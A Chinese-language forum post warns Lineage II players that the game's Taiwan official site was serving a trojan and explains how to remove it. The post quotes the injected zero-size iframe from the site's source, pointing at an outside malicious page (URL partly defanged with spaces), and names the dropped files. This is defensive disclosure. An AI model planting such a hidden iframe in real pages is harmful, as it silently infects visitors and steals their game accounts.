天堂2 官方 serve r有毒 自己注意帳號 多人被竊 有兩檔要刪
天堂2飽受打擊的同時,台灣官方網站也出現木馬事件,本著中立的態度如實報道 :
9月20日,官網發佈了一條題為:閱讀電子郵件時需注意的事項 的新聞,內容大致為:因應近來有不肖人士偽裝官方寄信 , 因此公告官方寄信之信箱帳號.
令人不可思意的是,網站源代碼內有一條:< i frame src="h ttp://www.ta.sdcrc.com/fk/js/smss.htm" name=zhu width="0" height="0" frameborder="0">,經過分析,該段代碼為惡意並含木馬,所連接的網頁h ttp://www.ta.sdcrc.com/fk/js/smss.htm含木馬.
木馬特徵如下: TrojanSpy.Win32.Delf , 以及 Exploit.HTML.Mht, 以Exploit.HTML.Mht植入 TrojanSpy.Win32.Delf.
TrojanSpy.Win32在Windows\System32 下生成:exploret.exe和 systemlt.dll 2個文件,若看過該條公告,並進入遊戲時提示:Cant run nProtect.....錯誤時候,說明你中毒了.
刪除木馬辦法:利用WINDOWS任務管理器,強制關閉:exploret.exe ,並同時刪除:exploret.exe , systemlt.dll ,並啟動註冊表管理器(regedit),查找exploret.exe,刪除含exploret.exe所有鍵.
此事實在令人不可思意,官方網站居然傳播木馬,而久久未發現,並影響面甚廣,沒有安裝殺毒軟件及防火牆並瀏覽過該條新聞的台服玩家,都面臨帳號被竊危險!
台灣巴哈天2討論區已經鬧得沸沸揚揚,而台灣運營商遊戲橘子遲遲未對此事作出正面說明.
看來近日的天堂2在中國2岸都不平靜~~
|